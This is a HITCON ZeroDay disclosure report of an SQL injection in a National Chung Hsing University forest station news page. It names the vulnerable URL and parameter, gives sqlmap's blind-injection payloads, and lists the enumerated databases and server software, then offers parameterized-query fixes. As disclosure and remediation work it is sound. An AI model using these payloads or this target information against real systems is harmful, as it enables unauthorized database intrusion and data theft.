Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2018-00335
- Vendor: 國立中興大學 (National Chung Hsing University)
- Title: SQL injection on a National Chung Hsing University site
- Introduction: SQL injection on the National Chung Hsing University Huisun Forest Station (惠蓀林場) site
Processing status
Current status:
- New submission
- Reviewed
- Reported
- Patched
- Not retested
- Public
Processing history
- 2018/04/01 00:47:11 : New submission (status updated by Cra5h)
- 2018/04/01 15:39:52 : Review completed (status updated by the HITCON ZeroDay service team)
- 2018/04/02 11:57:00 : Patching in progress (status updated by the HITCON ZeroDay service team)
- 2018/04/02 11:57:01 : Review completed (status updated by the HITCON ZeroDay service team)
- 2018/04/02 11:57:01 : Patching in progress (status updated by the HITCON ZeroDay service team)
- 2018/06/01 03:00:07 : Public (updated automatically by the HITCON ZeroDay platform)
- 2018/11/16 18:09:47 : Patched (status updated by the HITCON ZeroDay service team)
- 2018/11/24 03:00:21 : Public (updated automatically by the HITCON ZeroDay platform)
Details
- ZDID: ZD-2018-00335
- Reporter: cra5h (Cra5h)
- Risk: High
- Type: SQL Injection
References
Vulnerability description: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
Vulnerability description: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
Vulnerability description: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
Mitigation: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
Related URLs
Description
SQL injection on the National Chung Hsing University Huisun Forest Station site.
Injection point:
http://huisun.nchu.edu.tw/news/index.php?mode=data&id=326
The id parameter is not properly filtered, which leads to SQL injection.
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 201 HTTP(s) requests:
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: mode=data&id=326 AND 8869=8869
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: mode=data&id=326 AND SLEEP(5)
[22:34:19] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.12
[22:34:19] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\huisun.nchu.edu.tw'
Confirmed the affected databases (6 in total):
[22:34:39] [INFO] fetching database names
[22:34:39] [INFO] fetching number of databases
[22:34:39] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[22:34:39] [INFO] retrieved: 6
[22:34:43] [INFO] retrieved: information_schema
[22:36:06] [INFO] retrieved: forest
[22:36:35] [INFO] retrieved: mysql
[22:36:50] [INFO] retrieved: nchu_db
[22:37:16] [INFO] retrieved: performance_schema
[22:38:14] [INFO] retrieved: volunteer_db
available databases [6]:
[*] forest
[*] information_schema
[*] mysql
[*] nchu_db
[*] performance_schema
[*] volunteer_db
[22:39:05] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\huisun.nchu.edu.tw'
The data volume is large and the interaction is slow, so I only ran about half of it.
sqlmap resumed the following injection point(s) from stored session:
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: mode=data&id=326 AND 8869=8869
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: mode=data&id=326 AND SLEEP(5)
[22:40:30] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.12
[22:40:30] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
[22:40:30] [INFO] fetching database names
[22:40:30] [INFO] fetching number of databases
[22:40:30] [INFO] resumed: 6
[22:40:30] [INFO] resumed: information_schema
[22:40:30] [INFO] resumed: forest
[22:40:30] [INFO] resumed: mysql
[22:40:30] [INFO] resumed: nchu_db
[22:40:30] [INFO] resumed: performance_schema
[22:40:30] [INFO] resumed: volunteer_db
[22:40:30] [INFO] fetching tables for databases: 'forest, information_schema, mysql, nchu_db, performance_schema, volunteer_db'
Remediation advice
Filter the input and use parameterized queries.
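As an added illustration (not the reporter's or the site's code), the pattern this report describes, an unfiltered `id` from the query string concatenated into a MySQL query, beside the fix the remediation advice calls for: validate the parameter as an integer and bind it in a prepared statement. The table and column names (`news`, `id`, `title`, `body`) are assumptions.

```php
<?php
// Added example, not code from the reported site. Table/column names are assumed.

// Vulnerable pattern (PHP 5.3-era style): the raw GET value is spliced into the
// SQL text, so a value such as "326 AND SLEEP(5)" is executed as SQL. This is
// what the boolean-based and time-based blind payloads in the report exploit.
function fetch_news_vulnerable(mysqli $db, array $get)
{
    $id  = isset($get['id']) ? $get['id'] : '';
    $sql = "SELECT id, title, body FROM news WHERE id = " . $id;
    return $db->query($sql);
}

// Hardened version: allow-list the parameter (a positive integer only) and bind
// it as a typed parameter, so the value can never become SQL syntax.
function fetch_news_safe(mysqli $db, array $get)
{
    $raw = isset($get['id']) ? $get['id'] : '';
    $id  = filter_var($raw, FILTER_VALIDATE_INT,
                      array('options' => array('min_range' => 1)));
    if ($id === false) {
        // Reject anything that is not a plain decimal integer (e.g. "326 AND 1=1").
        header('HTTP/1.1 400 Bad Request');
        return null;
    }

    $stmt = $db->prepare("SELECT id, title, body FROM news WHERE id = ?");
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    $stmt->bind_param('i', $id);          // 'i' = integer; sent separately from the SQL
    $stmt->execute();
    $stmt->bind_result($rowId, $title, $body);   // bind_result works without mysqlnd
    $row = $stmt->fetch()
        ? array('id' => $rowId, 'title' => $title, 'body' => $body)
        : null;
    $stmt->close();
    return $row;
}

// Usage (connection details are placeholders):
// $db  = new mysqli('localhost', 'app_user', 'app_password', 'forest');
// $row = fetch_news_safe($db, $_GET);
```

With the hardened handler, the report's probe values `326 AND 8869=8869` and `326 AND SLEEP(5)` fail `FILTER_VALIDATE_INT` and are answered with a 400 before any query runs, which also gives the web log a clean signal for such attempts.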